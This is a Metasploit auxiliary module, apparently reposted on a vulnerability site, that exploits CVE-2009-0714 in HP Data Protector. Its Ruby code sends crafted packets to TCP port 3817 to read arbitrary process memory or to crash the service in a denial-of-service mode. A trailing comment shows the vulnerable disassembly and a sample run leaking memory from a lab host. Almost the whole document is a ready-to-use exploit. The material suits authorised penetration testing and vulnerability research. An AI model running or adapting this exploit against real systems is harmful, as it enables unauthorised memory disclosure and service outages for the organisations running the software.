Vulmon
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector 4.00-SP1 Build 43064 Memory leak and DoS',
'Description' => %q{
HP Data Protector is prone to a memory leak vulnerability. The same
vector of exploitation can be used for denial of service attack if
an invalid memory address is accessed.
},
'Author' => [ 'Nibin' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: ???? $',
'References' =>
[
[ 'URL', 'http://ivizsecurity.com/security-advisory-iviz-sr-09002.html' ],
[ 'CVE', 'CVE-2009-0714' ],
],
'DisclosureDate' => 'May 13 2009'))
register_options(
[
Opt::RPORT(3817),
OptString.new('MEMORY', [ false, 'The starting address of memory', '0x7ffdf000']),
OptString.new('SIZE', [false,'The size of memory to leak (in Bytes)',80]),
OptString.new('DoS', [false,'Enable or Disable DoS mode',false]),
], self.class)
end
def run
data = "\x54\x84\x00\x00"
data += "\x00\x00\x00\x00"
data += "\x06\x00\x00\x00"
data += "\x92\x00\x00\x00"
data += "x41" * 130
mem_size = datastore['SIZE'].to_i
mem_addr = datastore['MEMORY'].hex
if (mem_addr == 0)
puts("[!] Starting memory address is zero. Setting it to PEB address (Default)")
mem_addr = "0x7ffdf000".hex
end
if (mem_size < 0)
puts("[!] Memory size is negative. Setting it to default")
mem_size = 80
end
if (!datastore['DoS'])
offset = 0
print_status("Starting Memory Address: 0x#{mem_addr.to_s(16)} ")
while (offset < mem_size)
connect
t = ( ( ( ( mem_addr + offset ) - 0x1022A4F0 ) / 4 ) - 4 )
pkt = data[0,32] + ([t].pack('V')) + data[36,110]
sock.put(pkt)
sleep(1)
res = sock.get_once
leak = res[32,4].unpack('V')
puts "[*] Leaking Memory: 0x#{(mem_addr + offset).to_s(16)} -> 0x%x" % [leak.to_s]
offset +=4
disconnect
end
else
print_status("Sending evil packet")
pkt = data
connect
sock.put(pkt)
disconnect
end
end
end
=begin
Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80
100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754]
100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598]
100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data
100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset
100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak
100DDEA3 83C4 1C ADD ESP,1C
100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI
n@n-laptop:/mnt/projects/metasploit$ ./msfcli auxiliary/admin/dataprotector/hp_dataprotector RHOST=172.16.145.129 MEMORY=0x7ffdf000 E
[*]Please wait while we load the module tree...
[*] Starting Memory Address: 0x7ffdf000
[*] Leaking Memory: 0x7ffdf000 -> 0x12fbc4
[*] Leaking Memory: 0x7ffdf004 -> 0x130000
[*] Leaking Memory: 0x7ffdf008 -> 0x12d000
[*] Leaking Memory: 0x7ffdf00c -> 0x0
[*] Leaking Memory: 0x7ffdf010 -> 0x1e00
[*] Leaking Memory: 0x7ffdf014 -> 0x0
[*] Leaking Memory: 0x7ffdf018 -> 0x7ffdf000
[*] Leaking Memory: 0x7ffdf01c -> 0x0
[*] Leaking Memory: 0x7ffdf020 -> 0x674
[*] Leaking Memory: 0x7ffdf024 -> 0xa8
[*] Leaking Memory: 0x7ffdf028 -> 0x0
[*] Leaking Memory: 0x7ffdf02c -> 0x0
[*] Leaking Memory: 0x7ffdf030 -> 0x7ffd5000
[*] Leaking Memory: 0x7ffdf034 -> 0x0
[*] Leaking Memory: 0x7ffdf038 -> 0x0
[*] Leaking Memory: 0x7ffdf03c -> 0x0
[*] Leaking Memory: 0x7ffdf040 -> 0xe20abeb0
[*] Leaking Memory: 0x7ffdf044 -> 0x0
[*] Leaking Memory: 0x7ffdf048 -> 0x0
[*] Leaking Memory: 0x7ffdf04c -> 0x0
=end
<p>